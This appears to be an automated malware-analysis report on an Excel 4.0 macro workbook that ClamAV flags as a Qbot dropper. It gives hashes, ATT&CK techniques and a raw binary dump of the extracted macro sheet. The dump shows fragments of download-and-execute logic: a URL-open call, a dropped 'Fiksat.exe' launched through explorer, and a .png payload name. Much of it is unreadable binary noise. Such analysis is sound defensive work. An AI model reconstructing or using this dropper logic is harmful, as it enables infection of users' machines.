Qbot Office (OOXML) malware analysis — malicious · edc7305547132a38

MALICIOUS

Office (OOXML)

26.2 KB Created: 2006-09-16 00:00:00 UTC Authoring application: Microsoft Excel 14.0300 First seen: 2021-11-24

MD5: d22a165bd3fec3347d7941ef79a816df SHA-1: 18ff61d06ad869433fc67c66babc0533529c4837 SHA-256: edc7305547132a38dc3169d997403f28e493933bf419cdfc968df14862b1496c

120 Risk Score

Malware Insights

Qbot · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The file is identified as an Excel 4.0 macro sheet, a known precursor for malware delivery. The ClamAV signature 'Xls.Dropper.QbotDocu12020-9818439-0' strongly suggests it's a Qbot dropper. Excel 4.0 macros are typically used to execute commands, often to download and run additional malicious payloads.

Heuristics 2

ClamAV: Xls.Dropper.QbotDocu12020-9818439-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Dropper.QbotDocu12020-9818439-0
Excel 4.0 macro sheet (1 sheet(s)) critical OOXML_XLM_MACROSHEET

Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks. The macro sheet is stored as XLSB/BIFF12 binary content, which many XML-only OOXML scanners miss.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_sheet_00.bin xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.bin 3326 bytes

Filename	Kind	Source	Size
`xlm_sheet_00.bin`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/sheet1.bin	3326 bytes
SHA-256: `efdf16876203f44fe7b98ede18e9b2e23550da42636a1900c23d16b3665bb1a4`
Preview script First 1,000 lines of the extracted script � � � @ �� @ d � $ � � % �� & � � , � < �? � � � % �� & , % �� & , % �� & , % �� & , % �� & , % �� & , % �� & , % �� & , % �� & , % �� & , % �� & , % �� & , % �� & , % �� & , % �� & , % �� & , % �� & , % �� & , % �� & , % �� & , % �� & , % �� & , % �� & , % �� & , % �� & , % �� & , % �� & , % �� & { , N ; Z ;�Z ;�Z ;�Z ;� Z ;�Z ;�B � % �� & \| , . # : ;�: ;�B � % �� & } , . # : ;�: ;�B � % �� & ~ , N ; Z <�Z <�Z <�Z <� Z <�Z <�B � % �� & , g T # D� �D� � C : \ T e s t \ t e s t 2 \ F i k s a t . e x e B � % �� & � , r _ U R L O p e n U R L J J C C J G F J V H Y X D Y H D T Y H X D Y H D T Y B � % �� & � , h U # e x p l o r e r C : \ T e s t \ t e s t 2 \ F i k s a t . e x e B � % �� & � , Q 1 2 5 4 7 5 0 . p n g % p �@ �� cAA� . p n g % �� & � , % �� & � , % �� & � , B 6 % �� & , � � B � � 0ffffff�?ffffff�? �? �?333333�?333333�?�

SHA-256: efdf16876203f44fe7b98ede18e9b2e23550da42636a1900c23d16b3665bb1a4

Preview script

First 1,000 lines of the extracted script

�  �  �   @      ��������    �                  �  �  �             @   d           � $                                    �  �  %      ��    & �  �     ,     �  <     �?  �         �  �  %      ��    &           ,                                              %      ��    &           ,                                              %      ��    &           ,                                    %      ��    &           ,                                    %      ��    &           ,                                    %      ��    &           ,                                    %      ��    &           ,                                    %      ��    &           ,                                    %      ��    &           ,                                    %      ��    &   	       ,                                    %      ��    &   
       ,                                    %      ��    &           ,                                    %      ��    &           ,                                    %      ��    &   
       ,                                    %      ��    &           ,                                    %      ��    &           ,                                    %      ��    &           ,                                    %      ��    &           ,                                    %      ��    &           ,                                              %      ��    &           ,                                              %      ��    &           ,                                              %      ��    &           ,                                              %      ��    &           ,                                              %      ��    &           ,                                    %      ��    &           ,                                              %      ��    &           ,                                              %      ��    &           ,                                              %      ��    &   {       ,                
N           ;   Z      ;�Z      ;�Z  
   ;�Z      ;� Z      ;�Z      ;�B �     %      ��    &   |       ,                 .               #    :      ;�:      ;�B �     %      ��    &   }       ,                 .               #    :      ;�:      ;�B �     %      ��    &   ~       ,                
N           ;   Z      <�Z      <�Z  
   <�Z      <� Z      <�Z      <�B �     %      ��    &           ,                 g           T   #       D�    �D�    �    C : \ T e s t \ t e s t 2 \ F i k s a t . e x e       B �     %      ��    &   �       ,                
r           _      U R L    O p e n U R L    J J C C J    G F J V H Y X D Y H D T Y H X D Y H D T Y      	 B �     %      ��    &   �       ,                 h           U   #          e x p l o r e r    C : \ T e s t \ t e s t 2 \ F i k s a t . e x e    B �     %      ��    &   �       ,                 Q            1 2 5 4 7 5 0 . p n g   %            p �@    �� cAA�    . p n g      %      ��    &   �       ,                          %      ��    &   �       ,                              %      ��    &   �       ,                
                B 6     %      ��    &           ,                              �  � B                                                                  �    � 0ffffff�?ffffff�?      �?      �?333333�?333333�?�

Open this report in the interactive analyzer, or submit your own file for analysis.